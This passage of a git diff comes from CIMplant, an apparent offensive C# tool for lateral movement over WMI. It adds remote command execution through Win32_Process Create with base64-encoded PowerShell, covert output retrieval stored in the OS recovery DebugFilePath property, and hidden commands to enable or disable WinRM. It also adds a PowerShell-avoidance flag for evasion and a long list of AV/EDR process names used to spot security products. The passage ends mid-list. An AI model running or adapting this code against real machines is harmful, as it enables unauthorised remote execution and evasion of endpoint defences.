== false) - { - //Console.WriteLine("Waiting for pipeline to finish..."); - Thread.Sleep(10000); + powershell.Commands.AddScript(command1, false); + powershell.Commands.AddScript(command2, false); + powershell.Commands.AddScript(command3, false); - // Check on our timeout here - TimeSpan elasped = DateTime.Now.Subtract(startTime); - if (elasped > timeout) - break; + // If running powershell.exe let's run it and not worry about the output otherwise it will hang for very long time + if (noDebugCheck) + { + // start the timer and get a timeout + DateTime startTime = DateTime.Now; + IAsyncResult asyncPs = powershell.BeginInvoke(); + + while (asyncPs.IsCompleted == false) + { + //Console.WriteLine("Waiting for pipeline to finish..."); + Thread.Sleep(10000); + + // Check on our timeout here + TimeSpan elasped = DateTime.Now.Subtract(startTime); + if (elasped > timeout) + break; + } + //powershell.EndInvoke(asyncPs); } - //powershell.EndInvoke(asyncPs); + else + powershell.Invoke(); } else - powershell.Invoke(); + wsman = false; } - else - wsman = false; } - } - GetOut: - if (wsman == false) - { - if (string.IsNullOrEmpty(planter.System?.ToString())) + GetOut: + if (wsman == false) { - try + if (string.IsNullOrEmpty(planter.System?.ToString())) { - ProcessStartInfo procStartInfo = new ProcessStartInfo("cmd", "/c " + command) + try { - RedirectStandardOutput = true, - UseShellExecute = false, - CreateNoWindow = true - }; - - Process proc = new Process { StartInfo = procStartInfo }; - proc.Start(); - - // Get the output into a string - string result = proc.StandardOutput.ReadToEnd(); - // Display the command output. - Console.WriteLine(result); - } - catch (Exception e) - { - Console.WriteLine(e); - } + ProcessStartInfo procStartInfo = new ProcessStartInfo("cmd", "/c " + command) + { + RedirectStandardOutput = true, + UseShellExecute = false, + CreateNoWindow = true + }; - return true; - } + Process proc = new Process { StartInfo = procStartInfo }; + proc.Start(); - // WSMAN not enabled on the remote system, use another method - ObjectGetOptions options = new ObjectGetOptions(); - ManagementPath pather = new ManagementPath("Win32_Process"); - ManagementClass classInstance = new ManagementClass(scope, pather, options); - ManagementBaseObject inParams = classInstance.GetMethodParameters("Create"); + // Get the output into a string + string result = proc.StandardOutput.ReadToEnd(); + // Display the command output. + Console.WriteLine(result); + } + catch (Exception e) + { + Console.WriteLine(e); + } - string encodedCommand = "$data = (" + command + - " | Out-String).Trim(); $encdata = [Int[]][Char[]]$data -Join ','; $a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; + return true; + } - var encodedCommandB64 = - Convert.ToBase64String(Encoding.Unicode.GetBytes(encodedCommand)); + // WSMAN not enabled on the remote system, use another method + ObjectGetOptions options = new ObjectGetOptions(); + ManagementPath pather = new ManagementPath("Win32_Process"); + ManagementClass classInstance = new ManagementClass(scope, pather, options); + ManagementBaseObject inParams = classInstance.GetMethodParameters("Create"); - inParams["CommandLine"] = "powershell -enc " + encodedCommandB64; + string encodedCommand = "$data = (" + command + + " | Out-String).Trim(); $encdata = [Int[]][Char[]]$data -Join ','; $a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; - if (noDebugCheck) - { - // Method Options to set a timeout - InvokeMethodOptions methodOptions = new InvokeMethodOptions(null, timeout); + var encodedCommandB64 = + Convert.ToBase64String(Encoding.Unicode.GetBytes(encodedCommand)); - ManagementBaseObject outParams = classInstance.InvokeMethod("Create", inParams, methodOptions); - } - else - { - ManagementBaseObject outParams = classInstance.InvokeMethod("Create", inParams, null); + inParams["CommandLine"] = "powershell -enc " + encodedCommandB64; + + if (noDebugCheck) + { + // Method Options to set a timeout + InvokeMethodOptions methodOptions = new InvokeMethodOptions(null, timeout); + + ManagementBaseObject outParams = classInstance.InvokeMethod("Create", inParams, methodOptions); + } + else + { + ManagementBaseObject outParams = classInstance.InvokeMethod("Create", inParams, null); + } } - } - if (!noDebugCheck) - { - // Give it a second to write and check for changes to DebugFilePath - Thread.Sleep(5000); - CheckForFinishedDebugFilePath(originalWmiProperty, scope); + if (!noDebugCheck) + { + // Give it a second to write and check for changes to DebugFilePath + Thread.Sleep(5000); + CheckForFinishedDebugFilePath(originalWmiProperty, scope); - //Get the contents of the file in the DebugFilePath prop - string[] commandOutput = GetOsRecovery(scope).Split(','); - StringBuilder output = new StringBuilder(); + //Get the contents of the file in the DebugFilePath prop + string[] commandOutput = GetOsRecovery(scope).Split(','); + StringBuilder output = new StringBuilder(); - //Print output. - foreach (string integer in commandOutput) - { - try - { - char a = (char)Convert.ToInt32(integer); - output.Append(a); - } - catch + //Print output. + foreach (string integer in commandOutput) { - //pass + try + { + char a = (char)Convert.ToInt32(integer); + output.Append(a); + } + catch + { + //pass + } } + + Console.WriteLine(output); } + else + Console.WriteLine("New process spawned, not checking for output"); - Console.WriteLine(output); + SetOsRecovery(scope, originalWmiProperty); } else - Console.WriteLine("New process spawned, not checking for output"); + { + Console.WriteLine("Shhh...Not using PS"); - SetOsRecovery(scope, originalWmiProperty); + // Create the parameters and create the new process. + ObjectGetOptions options = new ObjectGetOptions(); + ManagementPath pather = new ManagementPath("Win32_Process"); + ManagementClass classInstance = new ManagementClass(scope, pather, options); + ManagementBaseObject inParams = classInstance.GetMethodParameters("Create"); + + inParams["CommandLine"] = command; + ManagementBaseObject outParams = classInstance.InvokeMethod("Create", inParams, null); + + Console.WriteLine(Convert.ToUInt32(outParams["ReturnValue"]) == 0 + ? "Successfully created process" + : "Issues creating process"); + } return true; } @@ -1026,38 +1287,52 @@ public object disable_winrm(Planter planter) { ManagementScope scope = planter.Connector.ConnectedWmiSession; - ObjectGetOptions options = new ObjectGetOptions(); - ManagementPath pather = new ManagementPath("Win32_Process"); - ManagementClass classInstance = new ManagementClass(scope, pather, options); - ManagementBaseObject inParams = classInstance.GetMethodParameters("Create"); - inParams["CommandLine"] = "powershell -w hidden -command \"Disable-PSRemoting -Force\""; + if (!planter.Commander.NoPS) + { + ObjectGetOptions options = new ObjectGetOptions(); + ManagementPath pather = new ManagementPath("Win32_Process"); + ManagementClass classInstance = new ManagementClass(scope, pather, options); + ManagementBaseObject inParams = classInstance.GetMethodParameters("Create"); + inParams["CommandLine"] = "powershell -w hidden -command \"Disable-PSRemoting -Force\""; - ManagementBaseObject outParams = classInstance.InvokeMethod("Create", inParams, null); - - Console.WriteLine(outParams != null && Convert.ToUInt32(outParams["ReturnValue"]) == 0 - ? "Successfully disabled WinRM" - : "Issues disabling WinRM"); + ManagementBaseObject outParams = classInstance.InvokeMethod("Create", inParams, null); - return true; + Console.WriteLine(outParams != null && Convert.ToUInt32(outParams["ReturnValue"]) == 0 + ? "Successfully disabled WinRM" + : "Issues disabling WinRM"); + return true; + } + else + { + Messenger.WarningMessage("Not running function to avoid any PowerShell usage, remove --nops or pick a new function"); + return null; + } } public object enable_winrm(Planter planter) { ManagementScope scope = planter.Connector.ConnectedWmiSession; - ObjectGetOptions options = new ObjectGetOptions(); - ManagementPath pather = new ManagementPath("Win32_Process"); - ManagementClass classInstance = new ManagementClass(scope, pather, options); - ManagementBaseObject inParams = classInstance.GetMethodParameters("Create"); - inParams["CommandLine"] = "powershell -w hidden -command \"Enable-PSRemoting -Force\""; + if (!planter.Commander.NoPS) + { + ObjectGetOptions options = new ObjectGetOptions(); + ManagementPath pather = new ManagementPath("Win32_Process"); + ManagementClass classInstance = new ManagementClass(scope, pather, options); + ManagementBaseObject inParams = classInstance.GetMethodParameters("Create"); + inParams["CommandLine"] = "powershell -w hidden -command \"Enable-PSRemoting -Force\""; - ManagementBaseObject outParams = classInstance.InvokeMethod("Create", inParams, null); - - Console.WriteLine(outParams != null && Convert.ToUInt32(outParams["ReturnValue"]) == 0 - ? "Successfully enabled WinRM" - : "Issues enabling WinRM"); + ManagementBaseObject outParams = classInstance.InvokeMethod("Create", inParams, null); - return true; + Console.WriteLine(outParams != null && Convert.ToUInt32(outParams["ReturnValue"]) == 0 + ? "Successfully enabled WinRM" + : "Issues enabling WinRM"); + return true; + } + else + { + Messenger.WarningMessage("Not running function to avoid any PowerShell usage, remove --nops or pick a new function"); + return null; + } } public object registry_mod(Planter planter) @@ -1632,24 +1907,56 @@ public object ps(Planter planter) ManagementObjectSearcher fileSearcher = new ManagementObjectSearcher(scope, fileQuery); ManagementObjectCollection queryCollection = fileSearcher.Get(); - Console.WriteLine("{0,-35}{1,15}", "Name", "Handle"); - Console.WriteLine("{0,-35}{1,15}", "-----------", "---------"); + Console.WriteLine("{0,-50}{1,15}", "Name", "Handle"); + Console.WriteLine("{0,-50}{1,15}", "-----------", "---------"); foreach (var o in queryCollection) { var wmiObject = (ManagementObject) o; string name = (string)wmiObject["Name"]; - if (name.Length > 30) - name = Truncate(name, 30) + "..."; + if (name.Length > 45) + name = Truncate(name, 45) + "..."; try { - Console.WriteLine("{0,-35}{1,15}", name, wmiObject["Handle"]); + if (Messenger.AVs.Any(name.ToLower().Equals)) + { + // Make AV/EDR pop + if (Console.BackgroundColor == ConsoleColor.Black) + { + Console.ForegroundColor = ConsoleColor.Red; + Console.WriteLine("{0,-50}{1,15}", name, wmiObject["Handle"]); + Console.ResetColor(); + } + } + else if (Messenger.Admin.Any(name.ToLower().Equals)) + { + // Make admin tools pop + if (Console.BackgroundColor == ConsoleColor.Black) + { + Console.ForegroundColor = ConsoleColor.Cyan; + Console.WriteLine("{0,-50}{1,15}", name, wmiObject["Handle"]); + Console.ResetColor(); + } + } + else + Console.WriteLine("{0,-50}{1,15}", name, wmiObject["Handle"]); } catch { //value probably doesn't exist, so just pass } } + + Messenger.BlueMessage("\nDenotes a potential admin tool"); + Messenger.ErrorMessage("Denotes a potential AV/EDR product"); + + + + + + + + return queryCollection; } diff --git a/CIMplant/Messenger.cs b/CIMplant/Messenger.cs old mode 100755 new mode 100644 index f65ce9d..a13de0a --- a/CIMplant/Messenger.cs +++ b/CIMplant/Messenger.cs @@ -1,6 +1,5 @@ using System; using System.Collections.Generic; -using System.IO; namespace CIMplant { @@ -32,6 +31,19 @@ public static void WarningMessage(string output) Console.WriteLine(output); } + public static void BlueMessage(string output) + { + // Make cool messages pop + if (Console.BackgroundColor == ConsoleColor.Black) + { + Console.ForegroundColor = ConsoleColor.Cyan; + Console.WriteLine(output); + Console.ResetColor(); + } + else + Console.WriteLine(output); + } + public static void GoodMessage(string output) { // Make cool messages pop @@ -73,7 +85,7 @@ public static void GetCommands() "upload** - Upload a file to the targeted machine" } }, - {"Lateral Movement Facilitation", new string[] {"command_exec - Run a command line command and receive the output", + {"Lateral Movement Facilitation", new string[] {"command_exec** - Run a command line command and receive the output. Run with nops flag to disable PowerShell", "disable_wdigest - Sets the registry value for UseLogonCredential to zero", "enable_wdigest - Adds registry value UseLogonCredential", "disable_winrm** - Disables WinRM on the targeted system", @@ -101,7 +113,9 @@ public static void GetCommands() "logoff - Log users off the targeted machine", "reboot (or restart) - Reboot the targeted machine", "power_off (or shutdown) - Power off the targeted machine", - "vacant_system - Determine if a user is away from the system" + "vacant_system - Determine if a user is away from the system", + "edr_query - Query the local or remote system for EDR vendors" + } }, {"Log Operations", new string[] {"logon_events - Identify users that have logged onto a system"}} @@ -136,7 +150,8 @@ public static void GetCommands() } } - Console.WriteLine("\n** Denotes PowerShell usage (either using a PowerShell Runspace or Win32_Process::Create method)"); + Console.WriteLine("\n* PowerShell can be disabled by using the --nops flag"); + Console.WriteLine("** Denotes PowerShell usage (either using a PowerShell Runspace or through Win32_Process::Create method)"); } else @@ -165,7 +180,8 @@ public static void GetCommands() } } - Console.WriteLine("\n** Denotes PowerShell usage (either using a PowerShell Runspace or Win32_Process::Create method)"); + Console.WriteLine("\n* PowerShell can be disabled by using the --nops flag"); + Console.WriteLine("** Denotes PowerShell usage (either using a PowerShell Runspace or Win32_Process::Create method)"); } Environment.Exit(0); @@ -215,7 +231,8 @@ public static void GetExamples() @"logoff (or logout) , -c logoff , -c logoff -s 192.168.64.4 -u test -p 1", @"reboot (or restart) , -c reboot , -c reboot -s 192.168.64.4 -u test -p 1", @"power_off (or shutdown) , -c power_off , -c shutdown -s 192.168.64.4 -u test -p 1", - @"vacant_system , -c vacant_system , -c vacant_system -s 192.168.64.4 -u test -p 1" + @"vacant_system , -c vacant_system , -c vacant_system -s 192.168.64.4 -u test -p 1", + @"edr_query , -c edr_query, -c edr_query -s 192.168.64.4 -u test -p 1" } }, {"Log Operations", new string[] { @"logon_events , -c logon_events , -c logon_events -s 192.168.64.4 -u test -p 1" }} @@ -284,5 +301,195 @@ public static void GetExamples() Environment.Exit(0); } + // Thanks Harley! + // https://github.com/harleyQu1nn/AggressorScripts/blob/master/ProcessColor.cna + public static readonly string[] AVs = {"Tanium.exe", "360RP.exe", "360SD.exe", "360Safe.exe", "360leakfixer.exe", "360rp.exe", "360safe.exe", "360sd.exe", + "360tray.exe", "AAWTray.exe", "ACAAS.exe", "ACAEGMgr.exe", "ACAIS.exe", "AClntUsr.EXE", "ALERT.EXE", "ALERTSVC.EXE", "ALMon.exe", "ALUNotify.exe", + "ALUpdate.exe", "ALsvc.exe", "AVENGINE.exe", "AVGCHSVX.EXE", "AVGCSRVX.EXE", "AVGIDSAgent.exe", "AVGIDSMonitor.exe", "AVGIDSUI.exe", "AVGIDSWatcher.exe", + "AVGNSX.EXE", "AVKProxy.exe", "AVKService.exe", "AVKTray.exe", "AVKWCtl.exe", "AVP.EXE", "AVP.exe", "AVPDTAgt.exe", "AcctMgr.exe", "Ad-Aware.exe", + "Ad-Aware2007.exe", "AddressExport.exe", "AdminServer.exe", "Administrator.exe", "AeXAgentUIHost.exe", "AeXNSAgent.exe", "AeXNSRcvSvc.exe", "AlertSvc.exe", + "AlogServ.exe", "AluSchedulerSvc.exe", "AnVir.exe", "AppSvc32.exe", "AtrsHost.exe", "Auth8021x.exe", "AvastSvc.exe", "AvastUI.exe", "Avconsol.exe", "AvpM.exe", + "Avsynmgr.exe", "Avtask.exe", "BLACKD.exe", "BWMeterConSvc.exe", "CAAntiSpyware.exe", "CALogDump.exe", "CAPPActiveProtection.exe", "CAPPActiveProtection.exe", + "CB.exe", "CCAP.EXE", "CCenter.exe", "CClaw.exe", "CLPS.exe", "CLPSLA.exe", "CLPSLS.exe", "CNTAoSMgr.exe", "CPntSrv.exe", "CTDataLoad.exe", + "CertificationManagerServiceNT.exe", "ClShield.exe", "ClamTray.exe", "ClamWin.exe", "Console.exe", "CylanceUI.exe", "DAO_Log.exe", "DLService.exe", + "DLTray.EXE", "DLTray.exe", "DRWAGNTD.EXE", "DRWAGNUI.EXE", "DRWEB32W.EXE", "DRWEBSCD.EXE", "DRWEBUPW.EXE", "DRWINST.EXE", "DSMain.exe", "DWHWizrd.exe", + "DefWatch.exe", "DolphinCharge.exe", "EHttpSrv.exe", "EMET_Agent.exe", "EMET_Service.exe", "EMLPROUI.exe", "EMLPROXY.exe", "EMLibUpdateAgentNT.exe", + "ETConsole3.exe", "ETCorrel.exe", "ETLogAnalyzer.exe", "ETReporter.exe", "ETRssFeeds.exe", "EUQMonitor.exe", "EndPointSecurity.exe", "EngineServer.exe", + "EntityMain.exe", "EtScheduler.exe", "EtwControlPanel.exe", "EventParser.exe", "FAMEH32.exe", "FCDBLog.exe", "FCH32.exe", "FPAVServer.exe", "FProtTray.exe", + "FSCUIF.exe", "FSHDLL32.exe", "FSM32.exe", "FSMA32.exe", "FSMB32.exe", "FWCfg.exe", "FireSvc.exe", "FireTray.exe", "FirewallGUI.exe", "ForceField.exe", + "FortiProxy.exe", "FortiTray.exe", "FortiWF.exe", "FrameworkService.exe", "FreeProxy.exe", "GDFirewallTray.exe", "GDFwSvc.exe", "HWAPI.exe", "ISNTSysMonitor.exe", + "ISSVC.exe", "ISWMGR.exe", "ITMRTSVC.exe", "ITMRT_SupportDiagnostics.exe", "ITMRT_TRACE.exe", "IcePack.exe", "IdsInst.exe", "InoNmSrv.exe", "InoRT.exe", + "InoRpc.exe", "InoTask.exe", "InoWeb.exe", "IsntSmtp.exe", "KABackReport.exe", "KANMCMain.exe", "KAVFS.EXE", "KAVStart.exe", "KLNAGENT.EXE", "KMailMon.exe", + "KNUpdateMain.exe", "KPFWSvc.exe", "KSWebShield.exe", "KVMonXP.exe", "KVMonXP_2.exe", "KVSrvXP.exe", "KWSProd.exe", "KWatch.exe", "KavAdapterExe.exe", + "KeyPass.exe", "KvXP.exe", "LUALL.EXE", "LWDMServer.exe", "LockApp.exe", "LockAppHost.exe", "LogGetor.exe", "MCSHIELD.EXE", "MCUI32.exe", "MSASCui.exe", + "ManagementAgentNT.exe", "McAfeeDataBackup.exe", "McEPOC.exe", "McEPOCfg.exe", "McNASvc.exe", "McProxy.exe", "McScript_InUse.exe", "McWCE.exe", + "McWCECfg.exe", "Mcshield.exe", "Mctray.exe", "MgntSvc.exe", "MpCmdRun.exe", "MpfAgent.exe", "MpfSrv.exe", "MsMpEng.exe", "NAIlgpip.exe", "NAVAPSVC.EXE", + "NAVAPW32.EXE", "NCDaemon.exe", "NIP.exe", "NJeeves.exe", "NLClient.exe", "NMAGENT.EXE", "NOD32view.exe", "NPFMSG.exe", "NPROTECT.EXE", "NRMENCTB.exe", + "NSMdtr.exe", "NTRtScan.exe", "NVCOAS.exe", "NVCSched.exe", "NavShcom.exe", "Navapsvc.exe", "NaveCtrl.exe", "NaveLog.exe", "NaveSP.exe", "Navw32.exe", + "Navwnt.exe", "Nip.exe", "Njeeves.exe", "Npfmsg2.exe", "Npfsvice.exe", "NscTop.exe", "Nvcoas.exe", "Nvcsched.exe", "Nymse.exe", "OLFSNT40.EXE", "OMSLogManager.exe", + "ONLINENT.exe", "ONLNSVC.exe", "OfcPfwSvc.exe", "PASystemTray.exe", "PAVFNSVR.exe", "PAVSRV51.exe", "PNmSrv.exe", "POPROXY.EXE", "POProxy.exe", "PPClean.exe", + "PPCtlPriv.exe", "PQIBrowser.exe", "PSHost.exe", "PSIMSVC.EXE", "PXEMTFTP.exe", "PadFSvr.exe", "Pagent.exe", "Pagentwd.exe", "PavBckPT.exe", "PavFnSvr.exe", + "PavPrSrv.exe", "PavProt.exe", "PavReport.exe", "Pavkre.exe", "PcCtlCom.exe", "PcScnSrv.exe", "PccNTMon.exe", "PccNTUpd.exe", "PpPpWallRun.exe", "PrintDevice.exe", + "ProUtil.exe", "PsCtrlS.exe", "PsImSvc.exe", "PwdFiltHelp.exe", "Qoeloader.exe", "RAVMOND.exe", "RAVXP.exe", "RNReport.exe", "RPCServ.exe", "RSSensor.exe", + "RTVscan.exe", "RapApp.exe", "Rav.exe", "RavAlert.exe", "RavMon.exe", "RavMonD.exe", "RavService.exe", "RavStub.exe", "RavTask.exe", "RavTray.exe", "RavUpdate.exe", + "RavXP.exe", "RealMon.exe", "Realmon.exe", "RedirSvc.exe", "RegMech.exe", "ReporterSvc.exe", "RouterNT.exe", "Rtvscan.exe", "SAFeService.exe", "SAService.exe", + "SAVAdminService.exe", "SAVFMSESp.exe", "SAVMain.exe", "SAVScan.exe", "SCANMSG.exe", "SCANWSCS.exe", "SCFManager.exe", "SCFService.exe", "SCFTray.exe", + "SDTrayApp.exe", "SEVINST.EXE", "SMEX_ActiveUpdate.exe", "SMEX_Master.exe", "SMEX_RemoteConf.exe", "SMEX_SystemWatch.exe", "SMSECtrl.exe", "SMSELog.exe", + "SMSESJM.exe", "SMSESp.exe", "SMSESrv.exe", "SMSETask.exe", "SMSEUI.exe", "SNAC.EXE", "SNAC.exe", "SNDMon.exe", "SNDSrvc.exe", "SPBBCSvc.exe", "SPIDERML.EXE", + "SPIDERNT.EXE", "SSM.exe", "SSScheduler.exe", "SVCharge.exe", "SVDealer.exe", "SVFrame.exe", "SVTray.exe", "SWNETSUP.EXE", "SavRoam.exe", "SavService.exe", + "SavUI.exe", "ScanMailOutLook.exe", "SeAnalyzerTool.exe", "SemSvc.exe", "SescLU.exe", "SetupGUIMngr.exe", "SiteAdv.exe", "Smc.exe", "SmcGui.exe", "SnHwSrv.exe", + "SnICheckAdm.exe", "SnIcon.exe", "SnSrv.exe", "SnicheckSrv.exe", "SpIDerAgent.exe", "SpntSvc.exe", "SpyEmergency.exe", "SpyEmergencySrv.exe", "StOPP.exe", + "StWatchDog.exe", "SymCorpUI.exe", "SymSPort.exe", "TBMon.exe", "TFGui.exe", "TFService.exe", "TFTray.exe", "TFun.exe", "TIASPN~1.EXE", "TSAnSrf.exe", "TSAtiSy.exe", + "TScutyNT.exe", "TSmpNT.exe", "TmListen.exe", "TmPfw.exe", "Tmntsrv.exe", "Traflnsp.exe", "TrapTrackerMgr.exe", "UPSCHD.exe", "UcService.exe", "UdaterUI.exe", + "UmxAgent.exe", "UmxCfg.exe", "UmxFwHlp.exe", "UmxPol.exe", "Up2date.exe", "UpdaterUI.exe", "UrlLstCk.exe", "UserActivity.exe", "UserAnalysis.exe", "UsrPrmpt.exe", + "V3Medic.exe", "V3Svc.exe", "VPC32.exe", "VPDN_LU.exe", "VPTray.exe", "VSStat.exe", "VsStat.exe", "VsTskMgr.exe", "WEBPROXY.EXE", "WFXCTL32.EXE", "WFXMOD32.EXE", + "WFXSNT40.EXE", "WebProxy.exe", "WebScanX.exe", "WinRoute.exe", "WrSpySetup.exe", "ZLH.exe", "Zanda.exe", "ZhuDongFangYu.exe", "Zlh.exe", "_avp32.exe", "_avpcc.exe", + "_avpm.exe", "aAvgApi.exe", "aawservice.exe", "acaif.exe", "acctmgr.exe", "ackwin32.exe", "aclient.exe", "adaware.exe", "advxdwin.exe", "aexnsagent.exe", + "aexsvc.exe", "aexswdusr.exe", "aflogvw.exe", "afwServ.exe", "agentsvr.exe", "agentw.exe", "ahnrpt.exe", "ahnsd.exe", "ahnsdsv.exe", "alertsvc.exe", "alevir.exe", + "alogserv.exe", "alsvc.exe", "alunotify.exe", "aluschedulersvc.exe", "amon9x.exe", "amswmagt.exe", "anti-trojan.exe", "antiarp.exe", "antivirus.exe", "ants.exe", + "aphost.exe", "apimonitor.exe", "aplica32.exe", "aps.exe", "apvxdwin.exe", "arr.exe", "ashAvast.exe", "ashBug.exe", "ashChest.exe", "ashCmd.exe", "ashDisp.exe", + "ashEnhcd.exe", "ashLogV.exe", "ashMaiSv.exe", "ashPopWz.exe", "ashQuick.exe", "ashServ.exe", "ashSimp2.exe", "ashSimpl.exe", "ashSkPcc.exe", "ashSkPck.exe", + "ashUpd.exe", "ashWebSv.exe", "ashdisp.exe", "ashmaisv.exe", "ashserv.exe", "ashwebsv.exe", "asupport.exe", "aswDisp.exe", "aswRegSvr.exe", "aswServ.exe", + "aswUpdSv.exe", "aswUpdsv.exe", "aswWebSv.exe", "aswupdsv.exe", "atcon.exe", "atguard.exe", "atro55en.exe", "atupdater.exe", "atwatch.exe", "atwsctsk.exe", + "au.exe", "aupdate.exe", "aupdrun.exe", "aus.exe", "auto-protect.nav80try.exe", "autodown.exe", "autotrace.exe", "autoup.exe", "autoupdate.exe", "avEngine.exe", + "avadmin.exe", "avcenter.exe", "avconfig.exe", "avconsol.exe", "ave32.exe", "avengine.exe", "avesvc.exe", "avfwsvc.exe", "avgam.exe", "avgamsvr.exe", "avgas.exe", + "avgcc.exe", "avgcc32.exe", "avgcsrvx.exe", "avgctrl.exe", "avgdiag.exe", "avgemc.exe", "avgfws8.exe", "avgfws9.exe", "avgfwsrv.exe", "avginet.exe", "avgmsvr.exe", + "avgnsx.exe", "avgnt.exe", "avgregcl.exe", "avgrssvc.exe", "avgrsx.exe", "avgscanx.exe", "avgserv.exe", "avgserv9.exe", "avgsystx.exe", "avgtray.exe", "avguard.exe", + "avgui.exe", "avgupd.exe", "avgupdln.exe", "avgupsvc.exe", "avgvv.exe", "avgw.exe", "avgwb.exe", "avgwdsvc.exe", "avgwizfw.exe", "avkpop.exe", "avkserv.exe", + "avkservice.exe", "avkwctl9.exe", "avltmain.exe", "avmailc.exe", "avmcdlg.exe", "avnotify.exe", "avnt.exe", "avp.exe", "avp32.exe", "avpcc.exe", "avpdos32.exe", + "avpexec.exe", "avpm.exe", "avpncc.exe", "avps.exe", "avptc32.exe", "avpupd.exe", "avscan.exe", "avsched32.exe", "avserver.exe", "avshadow.exe", "avsynmgr.exe", + "avwebgrd.exe", "avwin.exe", "avwin95.exe", "avwinnt.exe", "avwupd.exe", "avwupd32.exe", "avwupsrv.exe", "avxmonitor9x.exe", "avxmonitornt.exe", "avxquar.exe", + "backweb.exe", "bargains.exe", "basfipm.exe", "bd_professional.exe", "bdagent.exe", "bdc.exe", "bdlite.exe", "bdmcon.exe", "bdss.exe", "bdsubmit.exe", "beagle.exe", + "belt.exe", "bidef.exe", "bidserver.exe", "bipcp.exe", "bipcpevalsetup.exe", "bisp.exe", "blackd.exe", "blackice.exe", "blink.exe", "blss.exe", "bmrt.exe", + "bootconf.exe", "bootwarn.exe", "borg2.exe", "bpc.exe", "bpk.exe", "brasil.exe", "bs120.exe", "bundle.exe", "bvt.exe", "bwgo0000.exe", "ca.exe", "caav.exe", + "caavcmdscan.exe", "caavguiscan.exe", "caf.exe", "cafw.exe", "caissdt.exe", "capfaem.exe", "capfasem.exe", "capfsem.exe", "capmuamagt.exe", "casc.exe", + "casecuritycenter.exe", "caunst.exe", "cavrep.exe", "cavrid.exe", "cavscan.exe", "cavtray.exe", "ccApp.exe", "ccEvtMgr.exe", "ccLgView.exe", "ccProxy.exe", + "ccSetMgr.exe", "ccSetmgr.exe", "ccSvcHst.exe", "ccap.exe", "ccapp.exe", "ccevtmgr.exe", "cclaw.exe", "ccnfagent.exe", "ccprovsp.exe", "ccproxy.exe", "ccpxysvc.exe", + "ccschedulersvc.exe", "ccsetmgr.exe", "ccsmagtd.exe", "ccsvchst.exe", "ccsystemreport.exe", "cctray.exe", "ccupdate.exe", "cdp.exe", "cfd.exe", "cfftplugin.exe", + "cfgwiz.exe", "cfiadmin.exe", "cfiaudit.exe", "cfinet.exe", "cfinet32.exe", "cfnotsrvd.exe", "cfp.exe", "cfpconfg.exe", "cfpconfig.exe", "cfplogvw.exe", + "cfpsbmit.exe", "cfpupdat.exe", "cfsmsmd.exe", "checkup.exe", "cka.exe", "clamscan.exe", "claw95.exe", "claw95cf.exe", "clean.exe", "cleaner.exe", "cleaner3.exe", + "cleanpc.exe", "cleanup.exe", "click.exe", "cmdagent.exe", "cmdinstall.exe", "cmesys.exe", "cmgrdian.exe", "cmon016.exe", "comHost.exe", "connectionmonitor.exe", + "control_panel.exe", "cpd.exe", "cpdclnt.exe", "cpf.exe", "cpf9x206.exe", "cpfnt206.exe", "crashrep.exe", "csacontrol.exe", "csinject.exe", "csinsm32.exe", + "csinsmnt.exe", "csrss_tc.exe", "ctrl.exe", "cv.exe", "cwnb181.exe", "cwntdwmo.exe", "cz.exe", "datemanager.exe", "dbserv.exe", "dbsrv9.exe", "dcomx.exe", + "defalert.exe", "defscangui.exe", "defwatch.exe", "deloeminfs.exe", "deputy.exe", "diskmon.exe", "divx.exe", "djsnetcn.exe", "dllcache.exe", "dllreg.exe", + "doors.exe", "doscan.exe", "dpf.exe", "dpfsetup.exe", "dpps2.exe", "drwagntd.exe", "drwatson.exe", "drweb.exe", "drweb32.exe", "drweb32w.exe", "drweb386.exe", + "drwebcgp.exe", "drwebcom.exe", "drwebdc.exe", "drwebmng.exe", "drwebscd.exe", "drwebupw.exe", "drwebwcl.exe", "drwebwin.exe", "drwupgrade.exe", "dsmain.exe", + "dssagent.exe", "dvp95.exe", "dvp95_0.exe", "dwengine.exe", "dwhwizrd.exe", "dwwin.exe", "ecengine.exe", "edisk.exe", "efpeadm.exe", "egui.exe", "ekrn.exe", + "elogsvc.exe", "emet_agent.exe", "emet_service.exe", "emsw.exe", "engineserver.exe", "ent.exe", "era.exe", "esafe.exe", "escanhnt.exe", "escanv95.exe", + "esecagntservice.exe", "esecservice.exe", "esmagent.exe", "espwatch.exe", "etagent.exe", "ethereal.exe", "etrustcipe.exe", "evpn.exe", "evtProcessEcFile.exe", + "evtarmgr.exe", "evtmgr.exe", "exantivirus-cnet.exe", "exe.avxw.exe", "execstat.exe", "expert.exe", "explore.exe", "f-agnt95.exe", "f-prot.exe", "f-prot95.exe", + "f-stopw.exe", "fameh32.exe", "fast.exe", "fch32.exe", "fih32.exe", "findviru.exe", "firesvc.exe", "firetray.exe", "firewall.exe", "fmon.exe", "fnrb32.exe", + "fortifw.exe", "fp-win.exe", "fp-win_trial.exe", "fprot.exe", "frameworkservice.exe", "frminst.exe", "frw.exe", "fsaa.exe", "fsaua.exe", "fsav.exe", "fsav32.exe", + "fsav530stbyb.exe", "fsav530wtbyb.exe", "fsav95.exe", "fsavgui.exe", "fscuif.exe", "fsdfwd.exe", "fsgk32.exe", "fsgk32st.exe", "fsguidll.exe", "fsguiexe.exe", + "fshdll32.exe", "fsm32.exe", "fsma32.exe", "fsmb32.exe", "fsorsp.exe", "fspc.exe", "fspex.exe", "fsqh.exe", "fssm32.exe", "fwinst.exe", "gator.exe", "gbmenu.exe", + "gbpoll.exe", "gcascleaner.exe", "gcasdtserv.exe", "gcasinstallhelper.exe", "gcasnotice.exe", "gcasserv.exe", "gcasservalert.exe", "gcasswupdater.exe", + "generics.exe", "gfireporterservice.exe", "ghost_2.exe", "ghosttray.exe", "giantantispywaremain.exe", "giantantispywareupdater.exe", "gmt.exe", "guard.exe", + "guarddog.exe", "guardgui.exe", "hacktracersetup.exe", "hbinst.exe", "hbsrv.exe", "hipsvc.exe", "hotactio.exe", "hotpatch.exe", "htlog.exe", "htpatch.exe", + "hwpe.exe", "hxdl.exe", "hxiul.exe", "iamapp.exe", "iamserv.exe", "iamstats.exe", "ibmasn.exe", "ibmavsp.exe", "icepack.exe", "icload95.exe", "icloadnt.exe", + "icmon.exe", "icsupp95.exe", "icsuppnt.exe", "idle.exe", "iedll.exe", "iedriver.exe", "iface.exe", "ifw2000.exe", "igateway.exe", "inetlnfo.exe", "infus.exe", + "infwin.exe", "inicio.exe", "init.exe", "inonmsrv.exe", 